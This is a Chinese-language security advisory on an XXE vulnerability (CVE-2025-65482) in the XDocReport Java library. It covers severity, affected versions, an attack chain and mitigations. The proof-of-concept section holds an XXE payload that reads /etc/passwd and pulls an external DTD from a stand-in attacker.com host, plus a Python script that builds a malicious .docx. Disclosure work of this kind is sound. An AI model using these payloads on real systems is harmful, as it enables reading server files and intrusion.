CVE-2025-65482 opensagres XDocReport XXE漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-65482

漏洞类型

XXE (XML External Entity) 注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

opensagres XDocReport

漏洞概述

CVE-2025-65482是opensagres XDocReport组件中的一个严重XML外部实体(XXE)注入漏洞。该漏洞影响XDocReport v0.9.2至v2.0.3版本。攻击者可以通过上传精心构造的.docx文件来触发此漏洞，进而读取服务器上的任意文件或执行任意代码。由于该漏洞的CVSS评分高达9.8，属于严重级别，且攻击复杂度低、无需认证和用户交互，因此对使用该组件的系统构成极大威胁。XDocReport是一个流行的Java库，用于处理Office文档格式（如docx、odt等），广泛应用于各种企业应用和内容管理系统中。漏洞的根本原因在于该库在解析XML文档时未正确禁用外部实体引用，导致攻击者可以通过恶意构造的XML内容来利用服务器资源。

技术细节

该漏洞属于经典的XML外部实体(XXE)注入漏洞。在XDocReport处理.docx文件时，程序会解析文档内部的XML结构。攻击者可以构造一个包含外部实体引用的恶意.docx文件，在XML中引用外部DTD或实体，例如使用<!DOCTYPE>声明引用外部文件或URL。当XDocReport解析这个恶意文档时，会尝试加载攻击者指定的外部资源，从而实现以下攻击效果：1) 读取服务器上的敏感文件（如/etc/passwd、配置文件等）；2) 通过file://协议读取任意本地文件；3) 通过http://协议发起SSRF攻击；4) 结合其他技术实现远程代码执行。漏洞主要出现在DocumentFactory、XMLParser等核心解析类中，这些类在初始化XML解析器时未设置相应的安全属性（如disallow-doctype-decl、禁用外部实体等）。docx文件本质上是一个ZIP压缩包，其中包含多个XML文件，攻击者可以修改word/document.xml等文件来注入恶意XML内容。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用了opensagres XDocReport组件处理用户上传的.docx文件

STEP 2

步骤2: 构造恶意文档

攻击者创建一个包含XXE payload的.docx文件，在word/document.xml中注入外部实体引用，如<!DOCTYPE document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

STEP 3

步骤3: 上传恶意文件

攻击者将恶意.docx文件上传到目标服务器的文件上传接口

STEP 4

步骤4: 触发漏洞解析

XDocReport库解析上传的.docx文件时，未禁用外部实体，导致XML解析器加载攻击者指定的外部资源

STEP 5

步骤5: 敏感信息泄露

通过XXE攻击读取服务器上的敏感文件，如/etc/passwd、配置文件、密钥文件等

STEP 6

步骤6: 远程代码执行

攻击者结合其他技术（如expect://协议、jar协议或SSRF+反序列化）实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Malicious XXE payload to be placed in word/document.xml inside a .docx file -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY xxe2 SYSTEM "http://attacker.com/evil.dtd">
]>
<root>
  <content>&xxe;</content>
</root>

<!-- Python script to create malicious .docx file -->
import zipfile
import os

def create_xxe_docx():
    # Create a new .docx file (which is a ZIP archive)
    with zipfile.ZipFile('malicious.docx', 'w', zipfile.ZIP_DEFLATED) as docx:
        # Create [Content_Types].xml
        docx.writestr('[Content_Types].xml', '''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>''')
        
        # Create _rels/.rels
        docx.writestr('_rels/.rels', '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>''')
        
        # Create word/_rels/document.xml.rels
        docx.writestr('word/_rels/document.xml.rels', '''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
</Relationships>''')
        
        # Create malicious word/document.xml with XXE payload
        xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>&xxe;</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>'''
        docx.writestr('word/document.xml', xxe_payload)

if __name__ == '__main__':
    create_xxe_docx()
    print('Malicious .docx file created: malicious.docx')

影响范围

opensagres XDocReport >= 0.9.2

opensagres XDocReport <= 2.0.3

防御指南

临时缓解措施

在未完成升级前，可采取以下临时缓解措施：1) 对所有上传的Office文档进行深度内容扫描和恶意文件检测；2) 在应用层配置WAF规则，检测并拦截包含<!DOCTYPE、<!ENTITY、SYSTEM等XXE特征的请求；3) 限制服务器文件系统的读取权限，确保运行应用的账户无法访问敏感文件；4) 禁用不必要的协议处理器（如file://、http://等）；5) 实施网络隔离，限制应用服务器的外网访问权限；6) 监控文件上传功能的访问日志，及时发现异常上传行为。